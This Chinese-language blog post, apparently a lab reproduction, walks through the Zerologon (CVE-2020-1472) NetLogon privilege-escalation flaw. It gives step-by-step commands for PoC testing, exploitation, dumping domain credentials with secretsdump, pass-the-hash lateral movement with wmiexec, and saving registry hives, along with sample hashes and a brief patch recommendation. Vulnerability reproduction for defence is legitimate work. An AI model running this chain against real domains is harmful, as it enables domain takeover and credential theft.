微软NetLogon特权提升漏洞复现（CVE-2020-1472）

2021年2月22日00:00:50评论87 views字数 1351阅读4分30秒阅读模式

2020年08月12日，微软官方发布了 NetLogon 特权提升漏洞的风险通告。攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。

漏洞编号：CVE-2020-1472

漏洞级别：严重

漏洞利用：

1、查看域控的主机名

2、poc检测

poc：https://github.com/SecuraBV/CVE-2020-1472.gitpython3 zerologon_tester.py TEST-AD 10.1.1.24

微软NetLogon特权提升漏洞复现（CVE-2020-1472）

返回Success，说明漏洞存在。

3、exp漏洞利用，将域账号进行重置。

exp：

https://github.com/blackarrowsec/redteam-research

微软NetLogon特权提升漏洞复现（CVE-2020-1472）

4、导出域内所有用户的凭证

secretsdump.py 'test.com/[email protected]' -no-pass

微软NetLogon特权提升漏洞复现（CVE-2020-1472）

此时，TEST-AD$ hash已被替换为空。

TEST-AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

得到了域控的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::

5、使用administrator的hash横向连接

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040 TEST-AD$/Administrator@10.1.1.24

6、获取计算机账号原始hash

reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.saveget system.saveget sam.saveget security.savedel /f system.savedel /f sam.savedel /f security.save

微软NetLogon特权提升漏洞复现（CVE-2020-1472）

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

7、将该原始计算机帐户哈希还原

github地址：https://github.com/risksense/zerologonpython3 ./reinstall_original_pw.py TEST-AD 10.1.1.24 9b54a25e20fa4f8c7667edf62a03e2bd

微软NetLogon特权提升漏洞复现（CVE-2020-1472）

8、查看TEST-AD$账号的hash，已成功还原。

secretsdump.py 'test.com/bypass:[email protected]' -just-dc-user 'TEST-AD$'

修复建议：

微软官方已发布补丁，找到操作系统版本的漏洞补丁，并进行补丁下载安装。

本文始发于微信公众号（Bypass）：微软NetLogon特权提升漏洞复现（CVE-2020-1472）

左青龙
微信扫一扫

右白虎
微信扫一扫

微软NetLogon特权提升漏洞复现（CVE-2020-1472）

eBPF及HTTPS明文抓包的分析

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

shiro反序列化漏洞绕waf防护的方法总结 | 干货

关于我挖洞的经历

LLM 安全 | 大语言模型应用安全入门

浅谈API漏洞挖掘

滥⽤分叉完成代码注⼊对抗EDR

记一次参数走私导致的权限绕过

高级黑客技术-5. 反向Shell/Shell

第91篇：shiro反序列化漏洞绕waf防护的方法总结（上篇）

发表评论

在线咨询

微信